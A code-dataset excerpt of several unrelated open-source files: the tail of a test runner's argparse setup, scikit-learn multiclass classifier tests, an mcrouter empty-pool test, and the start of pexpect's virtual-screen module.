config=lib.cover.CoverageConfig)
add_extra_coverage_options(coverage_combine)
coverage_erase = coverage_subparsers.add_parser('erase',
parents=[coverage_common],
help='erase coverage data files')
coverage_erase.set_defaults(func=lib.cover.command_coverage_erase,
config=lib.cover.CoverageConfig)
coverage_report = coverage_subparsers.add_parser('report',
parents=[coverage_common],
help='generate console coverage report')
coverage_report.set_defaults(func=lib.cover.command_coverage_report,
config=lib.cover.CoverageReportConfig)
coverage_report.add_argument('--show-missing',
action='store_true',
help='show line numbers of statements not executed')
add_extra_coverage_options(coverage_report)
coverage_html = coverage_subparsers.add_parser('html',
parents=[coverage_common],
help='generate html coverage report')
coverage_html.set_defaults(func=lib.cover.command_coverage_html,
config=lib.cover.CoverageConfig)
add_extra_coverage_options(coverage_html)
coverage_xml = coverage_subparsers.add_parser('xml',
parents=[coverage_common],
help='generate xml coverage report')
coverage_xml.set_defaults(func=lib.cover.command_coverage_xml,
config=lib.cover.CoverageConfig)
add_extra_coverage_options(coverage_xml)
if argcomplete:
argcomplete.autocomplete(parser, always_complete_options=False, validator=lambda i, k: True)
args = parser.parse_args()
if args.explain and not args.verbosity:
args.verbosity = 1
if args.color == 'yes':
args.color = True
elif args.color == 'no':
args.color = False
else:
args.color = sys.stdout.isatty()
return args
def add_lint(parser):
"""
:type parser: argparse.ArgumentParser
"""
parser.add_argument('--lint',
action='store_true',
help='write lint output to stdout, everything else stderr')
parser.add_argument('--junit',
action='store_true',
help='write test failures to junit xml files')
parser.add_argument('--failure-ok',
action='store_true',
help='exit successfully on failed tests after saving results')
def add_changes(parser, argparse):
"""
:type parser: argparse.ArgumentParser
:type argparse: argparse
"""
parser.add_argument('--changed', action='store_true', help='limit targets based on changes')
changes = parser.add_argument_group(title='change detection arguments')
changes.add_argument('--tracked', action='store_true', help=argparse.SUPPRESS)
changes.add_argument('--untracked', action='store_true', help='include untracked files')
changes.add_argument('--ignore-committed', dest='committed', action='store_false', help='exclude committed files')
changes.add_argument('--ignore-staged', dest='staged', action='store_false', help='exclude staged files')
changes.add_argument('--ignore-unstaged', dest='unstaged', action='store_false', help='exclude unstaged files')
changes.add_argument('--changed-from', metavar='PATH', help=argparse.SUPPRESS)
changes.add_argument('--changed-path', metavar='PATH', action='append', help=argparse.SUPPRESS)
def add_environments(parser, tox_version=False, tox_only=False):
"""
:type parser: argparse.ArgumentParser
:type tox_version: bool
:type tox_only: bool
"""
parser.add_argument('--requirements',
action='store_true',
help='install command requirements')
environments = parser.add_mutually_exclusive_group()
environments.add_argument('--local',
action='store_true',
help='run from the local environment')
if tox_version:
environments.add_argument('--tox',
metavar='VERSION',
nargs='?',
default=None,
const='.'.join(str(i) for i in sys.version_info[:2]),
choices=SUPPORTED_PYTHON_VERSIONS,
help='run from a tox virtualenv: %s' % ', '.join(SUPPORTED_PYTHON_VERSIONS))
else:
environments.add_argument('--tox',
action='store_true',
help='run from a tox virtualenv')
tox = parser.add_argument_group(title='tox arguments')
tox.add_argument('--tox-sitepackages',
action='store_true',
help='allow access to globally installed packages')
if tox_only:
environments.set_defaults(
docker=None,
remote=None,
remote_stage=None,
remote_aws_region=None,
remote_terminate=None,
)
return
environments.add_argument('--docker',
metavar='IMAGE',
nargs='?',
default=None,
const='default',
help='run from a docker container').completer = complete_docker
environments.add_argument('--remote',
metavar='PLATFORM',
default=None,
help='run from a remote instance').completer = complete_remote
remote = parser.add_argument_group(title='remote arguments')
remote.add_argument('--remote-stage',
metavar='STAGE',
help='remote stage to use: %(choices)s',
choices=['prod', 'dev'],
default='prod')
remote.add_argument('--remote-aws-region',
metavar='REGION',
help='remote aws region to use: %(choices)s (default: auto)',
choices=sorted(AWS_ENDPOINTS),
default=None)
remote.add_argument('--remote-terminate',
metavar='WHEN',
help='terminate remote instance: %(choices)s (default: %(default)s)',
choices=['never', 'always', 'success'],
default='never')
def add_extra_coverage_options(parser):
"""
:type parser: argparse.ArgumentParser
"""
parser.add_argument('--group-by',
metavar='GROUP',
action='append',
choices=lib.cover.COVERAGE_GROUPS,
help='group output by: %s' % ', '.join(lib.cover.COVERAGE_GROUPS))
parser.add_argument('--all',
action='store_true',
help='include all python source files')
parser.add_argument('--stub',
action='store_true',
help='generate empty report of all python source files')
def add_extra_docker_options(parser, integration=True):
"""
:type parser: argparse.ArgumentParser
:type integration: bool
"""
docker = parser.add_argument_group(title='docker arguments')
docker.add_argument('--docker-no-pull',
action='store_false',
dest='docker_pull',
help='do not explicitly pull the latest docker images')
docker.add_argument('--docker-keep-git',
action='store_true',
help='transfer git related files into the docker container')
if not integration:
return
docker.add_argument('--docker-util',
metavar='IMAGE',
default='httptester',
help='docker utility image to provide test services')
docker.add_argument('--docker-privileged',
action='store_true',
help='run docker container in privileged mode')
def complete_target(prefix, parsed_args, **_):
"""
:type prefix: unicode
:type parsed_args: any
:rtype: list[str]
"""
return find_target_completion(parsed_args.targets, prefix)
def complete_remote(prefix, parsed_args, **_):
"""
:type prefix: unicode
:type parsed_args: any
:rtype: list[str]
"""
del parsed_args
with open('test/runner/completion/remote.txt', 'r') as completion_fd:
images = completion_fd.read().splitlines()
return [i for i in images if i.startswith(prefix)]
def complete_docker(prefix, parsed_args, **_):
"""
:type prefix: unicode
:type parsed_args: any
:rtype: list[str]
"""
del parsed_args
images = sorted(get_docker_completion().keys())
return [i for i in images if i.startswith(prefix)]
def complete_windows(prefix, parsed_args, **_):
"""
:type prefix: unicode
:type parsed_args: any
:rtype: list[str]
"""
with open('test/runner/completion/windows.txt', 'r') as completion_fd:
images = completion_fd.read().splitlines()
return [i for i in images if i.startswith(prefix) and (not parsed_args.windows or i not in parsed_args.windows)]
def complete_network_platform(prefix, parsed_args, **_):
"""
:type prefix: unicode
:type parsed_args: any
:rtype: list[str]
"""
with open('test/runner/completion/network.txt', 'r') as completion_fd:
images = completion_fd.read().splitlines()
return [i for i in images if i.startswith(prefix) and (not parsed_args.platform or i not in parsed_args.platform)]
def complete_sanity_test(prefix, parsed_args, **_):
"""
:type prefix: unicode
:type parsed_args: any
:rtype: list[str]
"""
del parsed_args
tests = sorted(t.name for t in sanity_get_tests())
return [i for i in tests if i.startswith(prefix)]
if __name__ == '__main__':
main()
|
JPFrancoia/scikit-learn
|
refs/heads/master
|
sklearn/tests/test_multiclass.py
|
8
|
import numpy as np
import scipy.sparse as sp
from sklearn.utils.testing import assert_array_equal
from sklearn.utils.testing import assert_equal
from sklearn.utils.testing import assert_almost_equal
from sklearn.utils.testing import assert_true
from sklearn.utils.testing import assert_false
from sklearn.utils.testing import assert_raises
from sklearn.utils.testing import assert_warns
from sklearn.utils.testing import assert_greater
from sklearn.utils.testing import assert_raise_message
from sklearn.multiclass import OneVsRestClassifier
from sklearn.multiclass import OneVsOneClassifier
from sklearn.multiclass import OutputCodeClassifier
from sklearn.utils.multiclass import check_classification_targets, type_of_target
from sklearn.utils import shuffle
from sklearn.metrics import precision_score
from sklearn.metrics import recall_score
from sklearn.svm import LinearSVC, SVC
from sklearn.naive_bayes import MultinomialNB
from sklearn.linear_model import (LinearRegression, Lasso, ElasticNet, Ridge,
Perceptron, LogisticRegression)
from sklearn.tree import DecisionTreeClassifier, DecisionTreeRegressor
from sklearn.model_selection import GridSearchCV, cross_val_score
from sklearn.pipeline import Pipeline
from sklearn import svm
from sklearn import datasets
from sklearn.externals.six.moves import zip
iris = datasets.load_iris()
rng = np.random.RandomState(0)
perm = rng.permutation(iris.target.size)
iris.data = iris.data[perm]
iris.target = iris.target[perm]
n_classes = 3
def test_ovr_exceptions():
ovr = OneVsRestClassifier(LinearSVC(random_state=0))
assert_raises(ValueError, ovr.predict, [])
# Fail on multioutput data
assert_raises(ValueError, OneVsRestClassifier(MultinomialNB()).fit,
np.array([[1, 0], [0, 1]]),
np.array([[1, 2], [3, 1]]))
assert_raises(ValueError, OneVsRestClassifier(MultinomialNB()).fit,
np.array([[1, 0], [0, 1]]),
np.array([[1.5, 2.4], [3.1, 0.8]]))
def test_check_classification_targets():
# Test that check_classification_target return correct type. #5782
y = np.array([0.0, 1.1, 2.0, 3.0])
msg = type_of_target(y)
assert_raise_message(ValueError, msg, check_classification_targets, y)
def test_ovr_fit_predict():
# A classifier which implements decision_function.
ovr = OneVsRestClassifier(LinearSVC(random_state=0))
pred = ovr.fit(iris.data, iris.target).predict(iris.data)
assert_equal(len(ovr.estimators_), n_classes)
clf = LinearSVC(random_state=0)
pred2 = clf.fit(iris.data, iris.target).predict(iris.data)
assert_equal(np.mean(iris.target == pred), np.mean(iris.target == pred2))
# A classifier which implements predict_proba.
ovr = OneVsRestClassifier(MultinomialNB())
pred = ovr.fit(iris.data, iris.target).predict(iris.data)
assert_greater(np.mean(iris.target == pred), 0.65)
def test_ovr_partial_fit():
# Test if partial_fit is working as intented
X, y = shuffle(iris.data, iris.target, random_state=0)
ovr = OneVsRestClassifier(MultinomialNB())
ovr.partial_fit(X[:100], y[:100], np.unique(y))
ovr.partial_fit(X[100:], y[100:])
pred = ovr.predict(X)
ovr2 = OneVsRestClassifier(MultinomialNB())
pred2 = ovr2.fit(X, y).predict(X)
assert_almost_equal(pred, pred2)
assert_equal(len(ovr.estimators_), len(np.unique(y)))
assert_greater(np.mean(y == pred), 0.65)
# Test when mini batches doesn't have all classes
ovr = OneVsRestClassifier(MultinomialNB())
ovr.partial_fit(iris.data[:60], iris.target[:60], np.unique(iris.target))
ovr.partial_fit(iris.data[60:], iris.target[60:])
pred = ovr.predict(iris.data)
ovr2 = OneVsRestClassifier(MultinomialNB())
pred2 = ovr2.fit(iris.data, iris.target).predict(iris.data)
assert_almost_equal(pred, pred2)
assert_equal(len(ovr.estimators_), len(np.unique(iris.target)))
assert_greater(np.mean(iris.target == pred), 0.65)
def test_ovr_ovo_regressor():
# test that ovr and ovo work on regressors which don't have a decision_function
ovr = OneVsRestClassifier(DecisionTreeRegressor())
pred = ovr.fit(iris.data, iris.target).predict(iris.data)
assert_equal(len(ovr.estimators_), n_classes)
assert_array_equal(np.unique(pred), [0, 1, 2])
# we are doing something sensible
assert_greater(np.mean(pred == iris.target), .9)
ovr = OneVsOneClassifier(DecisionTreeRegressor())
pred = ovr.fit(iris.data, iris.target).predict(iris.data)
assert_equal(len(ovr.estimators_), n_classes * (n_classes - 1) / 2)
assert_array_equal(np.unique(pred), [0, 1, 2])
# we are doing something sensible
assert_greater(np.mean(pred == iris.target), .9)
def test_ovr_fit_predict_sparse():
for sparse in [sp.csr_matrix, sp.csc_matrix, sp.coo_matrix, sp.dok_matrix,
sp.lil_matrix]:
base_clf = MultinomialNB(alpha=1)
X, Y = datasets.make_multilabel_classification(n_samples=100,
n_features=20,
n_classes=5,
n_labels=3,
length=50,
allow_unlabeled=True,
random_state=0)
X_train, Y_train = X[:80], Y[:80]
X_test = X[80:]
clf = OneVsRestClassifier(base_clf).fit(X_train, Y_train)
Y_pred = clf.predict(X_test)
clf_sprs = OneVsRestClassifier(base_clf).fit(X_train, sparse(Y_train))
Y_pred_sprs = clf_sprs.predict(X_test)
assert_true(clf.multilabel_)
assert_true(sp.issparse(Y_pred_sprs))
assert_array_equal(Y_pred_sprs.toarray(), Y_pred)
# Test predict_proba
Y_proba = clf_sprs.predict_proba(X_test)
# predict assigns a label if the probability that the
# sample has the label is greater than 0.5.
pred = Y_proba > .5
assert_array_equal(pred, Y_pred_sprs.toarray())
# Test decision_function
clf_sprs = OneVsRestClassifier(svm.SVC()).fit(X_train, sparse(Y_train))
dec_pred = (clf_sprs.decision_function(X_test) > 0).astype(int)
assert_array_equal(dec_pred, clf_sprs.predict(X_test).toarray())
def test_ovr_always_present():
# Test that ovr works with classes that are always present or absent.
# Note: tests is the case where _ConstantPredictor is utilised
X = np.ones((10, 2))
X[:5, :] = 0
# Build an indicator matrix where two features are always on.
# As list of lists, it would be: [[int(i >= 5), 2, 3] for i in range(10)]
y = np.zeros((10, 3))
y[5:, 0] = 1
y[:, 1] = 1
y[:, 2] = 1
ovr = OneVsRestClassifier(LogisticRegression())
assert_warns(UserWarning, ovr.fit, X, y)
y_pred = ovr.predict(X)
assert_array_equal(np.array(y_pred), np.array(y))
y_pred = ovr.decision_function(X)
assert_equal(np.unique(y_pred[:, -2:]), 1)
y_pred = ovr.predict_proba(X)
assert_array_equal(y_pred[:, -1], np.ones(X.shape[0]))
# y has a constantly absent label
y = np.zeros((10, 2))
y[5:, 0] = 1 # variable label
ovr = OneVsRestClassifier(LogisticRegression())
assert_warns(UserWarning, ovr.fit, X, y)
y_pred = ovr.predict_proba(X)
assert_array_equal(y_pred[:, -1], np.zeros(X.shape[0]))
def test_ovr_multiclass():
# Toy dataset where features correspond directly to labels.
X = np.array([[0, 0, 5], [0, 5, 0], [3, 0, 0], [0, 0, 6], [6, 0, 0]])
y = ["eggs", "spam", "ham", "eggs", "ham"]
Y = np.array([[0, 0, 1],
[0, 1, 0],
[1, 0, 0],
[0, 0, 1],
[1, 0, 0]])
classes = set("ham eggs spam".split())
for base_clf in (MultinomialNB(), LinearSVC(random_state=0),
LinearRegression(), Ridge(),
ElasticNet()):
clf = OneVsRestClassifier(base_clf).fit(X, y)
assert_equal(set(clf.classes_), classes)
y_pred = clf.predict(np.array([[0, 0, 4]]))[0]
assert_equal(set(y_pred), set("eggs"))
# test input as label indicator matrix
clf = OneVsRestClassifier(base_clf).fit(X, Y)
y_pred = clf.predict([[0, 0, 4]])[0]
assert_array_equal(y_pred, [0, 0, 1])
def test_ovr_binary():
# Toy dataset where features correspond directly to labels.
X = np.array([[0, 0, 5], [0, 5, 0], [3, 0, 0], [0, 0, 6], [6, 0, 0]])
y = ["eggs", "spam", "spam", "eggs", "spam"]
Y = np.array([[0, 1, 1, 0, 1]]).T
classes = set("eggs spam".split())
def conduct_test(base_clf, test_predict_proba=False):
clf = OneVsRestClassifier(base_clf).fit(X, y)
assert_equal(set(clf.classes_), classes)
y_pred = clf.predict(np.array([[0, 0, 4]]))[0]
assert_equal(set(y_pred), set("eggs"))
if test_predict_proba:
X_test = np.array([[0, 0, 4]])
probabilities = clf.predict_proba(X_test)
assert_equal(2, len(probabilities[0]))
assert_equal(clf.classes_[np.argmax(probabilities, axis=1)],
clf.predict(X_test))
# test input as label indicator matrix
clf = OneVsRestClassifier(base_clf).fit(X, Y)
y_pred = clf.predict([[3, 0, 0]])[0]
assert_equal(y_pred, 1)
for base_clf in (LinearSVC(random_state=0), LinearRegression(),
Ridge(), ElasticNet()):
conduct_test(base_clf)
for base_clf in (MultinomialNB(), SVC(probability=True),
LogisticRegression()):
conduct_test(base_clf, test_predict_proba=True)
def test_ovr_multilabel():
# Toy dataset where features correspond directly to labels.
X = np.array([[0, 4, 5], [0, 5, 0], [3, 3, 3], [4, 0, 6], [6, 0, 0]])
y = np.array([[0, 1, 1],
[0, 1, 0],
[1, 1, 1],
[1, 0, 1],
[1, 0, 0]])
for base_clf in (MultinomialNB(), LinearSVC(random_state=0),
LinearRegression(), Ridge(),
ElasticNet(), Lasso(alpha=0.5)):
clf = OneVsRestClassifier(base_clf).fit(X, y)
y_pred = clf.predict([[0, 4, 4]])[0]
assert_array_equal(y_pred, [0, 1, 1])
assert_true(clf.multilabel_)
def test_ovr_fit_predict_svc():
ovr = OneVsRestClassifier(svm.SVC())
ovr.fit(iris.data, iris.target)
assert_equal(len(ovr.estimators_), 3)
assert_greater(ovr.score(iris.data, iris.target), .9)
def test_ovr_multilabel_dataset():
base_clf = MultinomialNB(alpha=1)
for au, prec, recall in zip((True, False), (0.51, 0.66), (0.51, 0.80)):
X, Y = datasets.make_multilabel_classification(n_samples=100,
n_features=20,
n_classes=5,
n_labels=2,
length=50,
allow_unlabeled=au,
random_state=0)
X_train, Y_train = X[:80], Y[:80]
X_test, Y_test = X[80:], Y[80:]
clf = OneVsRestClassifier(base_clf).fit(X_train, Y_train)
Y_pred = clf.predict(X_test)
assert_true(clf.multilabel_)
assert_almost_equal(precision_score(Y_test, Y_pred, average="micro"),
prec,
decimal=2)
assert_almost_equal(recall_score(Y_test, Y_pred, average="micro"),
recall,
decimal=2)
def test_ovr_multilabel_predict_proba():
base_clf = MultinomialNB(alpha=1)
for au in (False, True):
X, Y = datasets.make_multilabel_classification(n_samples=100,
n_features=20,
n_classes=5,
n_labels=3,
length=50,
allow_unlabeled=au,
random_state=0)
X_train, Y_train = X[:80], Y[:80]
X_test = X[80:]
clf = OneVsRestClassifier(base_clf).fit(X_train, Y_train)
# decision function only estimator. Fails in current implementation.
decision_only = OneVsRestClassifier(svm.SVR()).fit(X_train, Y_train)
assert_raises(AttributeError, decision_only.predict_proba, X_test)
# Estimator with predict_proba disabled, depending on parameters.
decision_only = OneVsRestClassifier(svm.SVC(probability=False))
decision_only.fit(X_train, Y_train)
assert_raises(AttributeError, decision_only.predict_proba, X_test)
Y_pred = clf.predict(X_test)
Y_proba = clf.predict_proba(X_test)
# predict assigns a label if the probability that the
# sample has the label is greater than 0.5.
pred = Y_proba > .5
assert_array_equal(pred, Y_pred)
def test_ovr_single_label_predict_proba():
base_clf = MultinomialNB(alpha=1)
X, Y = iris.data, iris.target
X_train, Y_train = X[:80], Y[:80]
X_test = X[80:]
clf = OneVsRestClassifier(base_clf).fit(X_train, Y_train)
# decision function only estimator. Fails in current implementation.
decision_only = OneVsRestClassifier(svm.SVR()).fit(X_train, Y_train)
assert_raises(AttributeError, decision_only.predict_proba, X_test)
Y_pred = clf.predict(X_test)
Y_proba = clf.predict_proba(X_test)
assert_almost_equal(Y_proba.sum(axis=1), 1.0)
# predict assigns a label if the probability that the
# sample has the label is greater than 0.5.
pred = np.array([l.argmax() for l in Y_proba])
assert_false((pred - Y_pred).any())
def test_ovr_multilabel_decision_function():
X, Y = datasets.make_multilabel_classification(n_samples=100,
n_features=20,
n_classes=5,
n_labels=3,
length=50,
allow_unlabeled=True,
random_state=0)
X_train, Y_train = X[:80], Y[:80]
X_test = X[80:]
clf = OneVsRestClassifier(svm.SVC()).fit(X_train, Y_train)
assert_array_equal((clf.decision_function(X_test) > 0).astype(int),
clf.predict(X_test))
def test_ovr_single_label_decision_function():
X, Y = datasets.make_classification(n_samples=100,
n_features=20,
random_state=0)
X_train, Y_train = X[:80], Y[:80]
X_test = X[80:]
clf = OneVsRestClassifier(svm.SVC()).fit(X_train, Y_train)
assert_array_equal(clf.decision_function(X_test).ravel() > 0,
clf.predict(X_test))
def test_ovr_gridsearch():
ovr = OneVsRestClassifier(LinearSVC(random_state=0))
Cs = [0.1, 0.5, 0.8]
cv = GridSearchCV(ovr, {'estimator__C': Cs})
cv.fit(iris.data, iris.target)
best_C = cv.best_estimator_.estimators_[0].C
assert_true(best_C in Cs)
def test_ovr_pipeline():
# Test with pipeline of length one
# This test is needed because the multiclass estimators may fail to detect
# the presence of predict_proba or decision_function.
clf = Pipeline([("tree", DecisionTreeClassifier())])
ovr_pipe = OneVsRestClassifier(clf)
ovr_pipe.fit(iris.data, iris.target)
ovr = OneVsRestClassifier(DecisionTreeClassifier())
ovr.fit(iris.data, iris.target)
assert_array_equal(ovr.predict(iris.data), ovr_pipe.predict(iris.data))
def test_ovr_coef_():
for base_classifier in [SVC(kernel='linear', random_state=0), LinearSVC(random_state=0)]:
# SVC has sparse coef with sparse input data
ovr = OneVsRestClassifier(base_classifier)
for X in [iris.data, sp.csr_matrix(iris.data)]:
# test with dense and sparse coef
ovr.fit(X, iris.target)
shape = ovr.coef_.shape
assert_equal(shape[0], n_classes)
assert_equal(shape[1], iris.data.shape[1])
# don't densify sparse coefficients
assert_equal(sp.issparse(ovr.estimators_[0].coef_), sp.issparse(ovr.coef_))
def test_ovr_coef_exceptions():
# Not fitted exception!
ovr = OneVsRestClassifier(LinearSVC(random_state=0))
# lambda is needed because we don't want coef_ to be evaluated right away
assert_raises(ValueError, lambda x: ovr.coef_, None)
# Doesn't have coef_ exception!
ovr = OneVsRestClassifier(DecisionTreeClassifier())
ovr.fit(iris.data, iris.target)
assert_raises(AttributeError, lambda x: ovr.coef_, None)
def test_ovo_exceptions():
ovo = OneVsOneClassifier(LinearSVC(random_state=0))
assert_raises(ValueError, ovo.predict, [])
def test_ovo_fit_on_list():
# Test that OneVsOne fitting works with a list of targets and yields the
# same output as predict from an array
ovo = OneVsOneClassifier(LinearSVC(random_state=0))
prediction_from_array = ovo.fit(iris.data, iris.target).predict(iris.data)
iris_data_list = [list(a) for a in iris.data]
prediction_from_list = ovo.fit(iris_data_list,
list(iris.target)).predict(iris_data_list)
assert_array_equal(prediction_from_array, prediction_from_list)
def test_ovo_fit_predict():
# A classifier which implements decision_function.
ovo = OneVsOneClassifier(LinearSVC(random_state=0))
ovo.fit(iris.data, iris.target).predict(iris.data)
assert_equal(len(ovo.estimators_), n_classes * (n_classes - 1) / 2)
# A classifier which implements predict_proba.
ovo = OneVsOneClassifier(MultinomialNB())
ovo.fit(iris.data, iris.target).predict(iris.data)
assert_equal(len(ovo.estimators_), n_classes * (n_classes - 1) / 2)
def test_ovo_partial_fit_predict():
X, y = shuffle(iris.data, iris.target)
ovo1 = OneVsOneClassifier(MultinomialNB())
ovo1.partial_fit(X[:100], y[:100], np.unique(y))
ovo1.partial_fit(X[100:], y[100:])
pred1 = ovo1.predict(X)
ovo2 = OneVsOneClassifier(MultinomialNB())
ovo2.fit(X, y)
pred2 = ovo2.predict(X)
assert_equal(len(ovo1.estimators_), n_classes * (n_classes - 1) / 2)
assert_greater(np.mean(y == pred1), 0.65)
assert_almost_equal(pred1, pred2)
# Test when mini-batches don't have all target classes
ovo1 = OneVsOneClassifier(MultinomialNB())
ovo1.partial_fit(iris.data[:60], iris.target[:60], np.unique(iris.target))
ovo1.partial_fit(iris.data[60:], iris.target[60:])
pred1 = ovo1.predict(iris.data)
ovo2 = OneVsOneClassifier(MultinomialNB())
pred2 = ovo2.fit(iris.data, iris.target).predict(iris.data)
assert_almost_equal(pred1, pred2)
assert_equal(len(ovo1.estimators_), len(np.unique(iris.target)))
assert_greater(np.mean(iris.target == pred1), 0.65)
def test_ovo_decision_function():
n_samples = iris.data.shape[0]
ovo_clf = OneVsOneClassifier(LinearSVC(random_state=0))
ovo_clf.fit(iris.data, iris.target)
decisions = ovo_clf.decision_function(iris.data)
assert_equal(decisions.shape, (n_samples, n_classes))
assert_array_equal(decisions.argmax(axis=1), ovo_clf.predict(iris.data))
# Compute the votes
votes = np.zeros((n_samples, n_classes))
k = 0
for i in range(n_classes):
for j in range(i + 1, n_classes):
pred = ovo_clf.estimators_[k].predict(iris.data)
votes[pred == 0, i] += 1
votes[pred == 1, j] += 1
k += 1
# Extract votes and verify
assert_array_equal(votes, np.round(decisions))
for class_idx in range(n_classes):
# For each sample and each class, there only 3 possible vote levels
# because they are only 3 distinct class pairs thus 3 distinct
# binary classifiers.
# Therefore, sorting predictions based on votes would yield
# mostly tied predictions:
assert_true(set(votes[:, class_idx]).issubset(set([0., 1., 2.])))
# The OVO decision function on the other hand is able to resolve
# most of the ties on this data as it combines both the vote counts
# and the aggregated confidence levels of the binary classifiers
# to compute the aggregate decision function. The iris dataset
# has 150 samples with a couple of duplicates. The OvO decisions
# can resolve most of the ties:
assert_greater(len(np.unique(decisions[:, class_idx])), 146)
def test_ovo_gridsearch():
ovo = OneVsOneClassifier(LinearSVC(random_state=0))
Cs = [0.1, 0.5, 0.8]
cv = GridSearchCV(ovo, {'estimator__C': Cs})
cv.fit(iris.data, iris.target)
best_C = cv.best_estimator_.estimators_[0].C
assert_true(best_C in Cs)
def test_ovo_ties():
# Test that ties are broken using the decision function,
# not defaulting to the smallest label
X = np.array([[1, 2], [2, 1], [-2, 1], [-2, -1]])
y = np.array([2, 0, 1, 2])
multi_clf = OneVsOneClassifier(Perceptron(shuffle=False))
ovo_prediction = multi_clf.fit(X, y).predict(X)
ovo_decision = multi_clf.decision_function(X)
# Classifiers are in order 0-1, 0-2, 1-2
# Use decision_function to compute the votes and the normalized
# sum_of_confidences, which is used to disambiguate when there is a tie in
# votes.
votes = np.round(ovo_decision)
normalized_confidences = ovo_decision - votes
# For the first point, there is one vote per class
assert_array_equal(votes[0, :], 1)
# For the rest, there is no tie and the prediction is the argmax
assert_array_equal(np.argmax(votes[1:], axis=1), ovo_prediction[1:])
# For the tie, the prediction is the class with the highest score
assert_equal(ovo_prediction[0], normalized_confidences[0].argmax())
def test_ovo_ties2():
# test that ties can not only be won by the first two labels
X = np.array([[1, 2], [2, 1], [-2, 1], [-2, -1]])
y_ref = np.array([2, 0, 1, 2])
# cycle through labels so that each label wins once
for i in range(3):
y = (y_ref + i) % 3
multi_clf = OneVsOneClassifier(Perceptron(shuffle=False))
ovo_prediction = multi_clf.fit(X, y).predict(X)
assert_equal(ovo_prediction[0], i % 3)
def test_ovo_string_y():
# Test that the OvO doesn't mess up the encoding of string labels
X = np.eye(4)
y = np.array(['a', 'b', 'c', 'd'])
ovo = OneVsOneClassifier(LinearSVC())
ovo.fit(X, y)
assert_array_equal(y, ovo.predict(X))
def test_ecoc_exceptions():
ecoc = OutputCodeClassifier(LinearSVC(random_state=0))
assert_raises(ValueError, ecoc.predict, [])
def test_ecoc_fit_predict():
# A classifier which implements decision_function.
ecoc = OutputCodeClassifier(LinearSVC(random_state=0),
code_size=2, random_state=0)
ecoc.fit(iris.data, iris.target).predict(iris.data)
assert_equal(len(ecoc.estimators_), n_classes * 2)
# A classifier which implements predict_proba.
ecoc = OutputCodeClassifier(MultinomialNB(), code_size=2, random_state=0)
ecoc.fit(iris.data, iris.target).predict(iris.data)
assert_equal(len(ecoc.estimators_), n_classes * 2)
def test_ecoc_gridsearch():
ecoc = OutputCodeClassifier(LinearSVC(random_state=0),
random_state=0)
Cs = [0.1, 0.5, 0.8]
cv = GridSearchCV(ecoc, {'estimator__C': Cs})
cv.fit(iris.data, iris.target)
best_C = cv.best_estimator_.estimators_[0].C
assert_true(best_C in Cs)
def test_pairwise_indices():
clf_precomputed = svm.SVC(kernel='precomputed')
X, y = iris.data, iris.target
ovr_false = OneVsOneClassifier(clf_precomputed)
linear_kernel = np.dot(X, X.T)
ovr_false.fit(linear_kernel, y)
n_estimators = len(ovr_false.estimators_)
precomputed_indices = ovr_false.pairwise_indices_
for idx in precomputed_indices:
assert_equal(idx.shape[0] * n_estimators / (n_estimators - 1),
linear_kernel.shape[0])
def test_pairwise_attribute():
clf_precomputed = svm.SVC(kernel='precomputed')
clf_notprecomputed = svm.SVC()
for MultiClassClassifier in [OneVsRestClassifier, OneVsOneClassifier]:
ovr_false = MultiClassClassifier(clf_notprecomputed)
assert_false(ovr_false._pairwise)
ovr_true = MultiClassClassifier(clf_precomputed)
assert_true(ovr_true._pairwise)
def test_pairwise_cross_val_score():
clf_precomputed = svm.SVC(kernel='precomputed')
clf_notprecomputed = svm.SVC(kernel='linear')
X, y = iris.data, iris.target
for MultiClassClassifier in [OneVsRestClassifier, OneVsOneClassifier]:
ovr_false = MultiClassClassifier(clf_notprecomputed)
ovr_true = MultiClassClassifier(clf_precomputed)
linear_kernel = np.dot(X, X.T)
score_precomputed = cross_val_score(ovr_true, linear_kernel, y)
score_linear = cross_val_score(ovr_false, X, y)
assert_array_equal(score_precomputed, score_linear)
|
tempbottle/mcrouter
|
refs/heads/master
|
mcrouter/test/test_empty_pool.py
|
13
|
# Copyright (c) 2015, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from mcrouter.test.McrouterTestCase import McrouterTestCase
class TestEmptyPool(McrouterTestCase):
config = './mcrouter/test/test_empty_pool.json'
extra_args = []
def get_mcrouter(self, extra_args=[]):
return self.add_mcrouter(self.config, extra_args=self.extra_args)
def test_empty_pool(self):
# Start a mcrouter without route handles
key = 'foo'
mcrouter_w_rh = self.get_mcrouter()
self.assertIsNone(mcrouter_w_rh.get(key))
|
dushu1203/chromium.src
|
refs/heads/nw12
|
third_party/pexpect/screen.py
|
171
|
"""This implements a virtual screen. This is used to support ANSI terminal
emulation. The screen representation and state is implemented in this class.
Most of the methods are inspired by ANSI screen control codes. The ANSI class
extends this class to add parsing of ANSI escape codes.
PEXPECT LICENSE
This license is approved by the OSI and FSF as GPL-compatible.
http://opensource.org/licenses/isc-license.txt
Copyright (c) 2012, Noah Spurrier <[email protected]>
PERMISSION TO USE, COPY, MODIFY, AND/OR DISTRIBUTE THIS SOFTWARE FOR ANY
PURPOSE WITH OR WITHOUT FEE IS HEREBY GRANTED, PROVIDED THAT THE ABOVE
COPYRIGHT NOTICE AND THIS PERMISSION NOTICE APPEAR IN ALL COPIES.
THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""
import copy
NUL = 0 # Fill character; ignored on input.
ENQ = 5 # Transmit answerback message.
BEL = 7 # Ring the bell.
BS = 8 # Move cursor left.
HT = 9 # Move cursor to next tab stop.
LF = 10 # Line feed.
VT = 11 # Same as LF.
FF = 12 # Same as LF.
CR = 13 # Move cursor to left margin or newline.
SO = 14 # Invoke G1 character set.
SI = 15 # Invoke G0 character set.
XON = 17 # Resume transmission.
XOFF = 19 # Halt transmission.
